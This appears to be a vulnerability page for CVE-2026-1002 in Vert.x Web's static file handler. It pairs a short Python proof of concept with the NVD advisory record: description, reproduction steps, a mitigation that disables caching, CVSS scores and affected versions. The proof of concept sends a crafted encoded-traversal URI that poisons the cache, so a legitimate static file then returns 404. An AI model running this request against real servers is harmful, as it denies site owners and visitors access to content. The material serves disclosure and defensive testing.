CVE-2026-1002

# CVE-2026-1002 PoC - Vert.x Web Static Handler Cache Manipulation # This PoC demonstrates how to deny access to static files using crafted URI import requests def exploit_cve_2026_1002(target_url): """ Target: Vert.x Web application with Static Handler caching enabled Attack: Manipulate cache to deny access to static files Example: - Legitimate URL: https://example.com/foo/index.html - Malicious URL: https://example.com/foo/bar%2F..%2Findex.html """ # Original accessible file original_path = "/foo/index.html" # Crafted URI with path traversal encoding # %2F = encoded '/', %2E%2E = encoded '..' manipulated_path = "/foo/bar%2F..%2Findex.html" print(f"[*] Testing CVE-2026-1002 on {target_url}") # Step 1: Verify original file is accessible response1 = requests.get(target_url + original_path) print(f"[+] Original request status: {response1.status_code}") # Step 2: Send crafted request to manipulate cache response2 = requests.get(target_url + manipulated_path) print(f"[*] Crafted request status: {response2.status_code}") # Step 3: Try accessing original file again (should return 404 if vulnerable) response3 = requests.get(target_url + original_path) print(f"[-] Original file after attack: {response3.status_code}") if response3.status_code == 404: print("[!] VULNERABLE: Access to static file has been denied!") return True else: print("[+] NOT VULNERABLE: File still accessible") return False # Example usage if __name__ == "__main__": target = "https://vulnerable-vertx-app.com" exploit_cve_2026_1002(target)

{"cve": {"id": "CVE-2026-1002", "sourceIdentifier": "[email protected]", "published": "2026-01-15T21:16:05.640", "lastModified": "2026-02-05T16:50:31.073", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Vert.x Web static handler component cache can be manipulated to deny the access to static files served by the handler using specifically crafted request URI.\n\n\nThe issue comes from an improper implementation of the C. rule of section 5.2.4 of RFC3986 and is fixed in Vert.x Core component (used by Vert.x Web): https://github.com/eclipse-vertx/vert.x/pull/5895 \n\n\n\nSteps to reproduce\nGiven a file served by the static handler, craft an URI that introduces a string like bar%2F..%2F after the last / char to deny the access to the URI with an HTTP 404 response. For example https://example.com/foo/index.html can be denied with https://example.com/foo/bar%2F..%2Findex.html\n\nMitgation\nDisabling Static Handler cache fixes the issue.\n\n\n\nStaticHandler staticHandler = StaticHandler.create().setCachingEnabled(false);"}, {"lang": "es", "value": "La caché del componente de gestión de archivos estáticos de Vert.x Web puede manipularse para denegar el acceso a los archivos estáticos servidos por el gestor mediante una URI de solicitud diseñada específicamente. El problema se debe a una implementación incorrecta de la regla C. de la sección 5.2.4 del RFC 3986 y se ha corregido en el componente Vert.x Core (utilizado por Vert.x Web): https://github.com/eclipse-vertx/vert.x/pull/5895 Pasos para reproducir el problema: dado un archivo servido por el controlador estático, cree una URI que introduzca una cadena como bar%2F..%2F después del último carácter / para denegar el acceso a la URI con una respuesta HTTP 404. Por ejemplo, https://example.com/foo/index.html puede denegarse con https://example.com/foo/bar%2F..%2Findex.html. Solución: Desactivar la caché del Static Handler soluciona el problema. StaticHandler staticHandler = StaticHandler.create().setCachingEnabled(false);"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-444"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:vert.x-web:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndIncluding": "4.5.23", "matchCriteriaId": "B0EFC135-C1C4-4CB9-A987-BD60A9598D23"}, {"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:vert.x-web:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndIncluding": "5.0.6", "matchCriteriaId": "F4161FEB-35F0-4F16-8B4C-16142905AAA2"}]}]}], "references": [{"url": "https://github.com/eclipse-vertx/vert.x/pull/5895", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/vert-x3/vertx-web/issues/2836", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}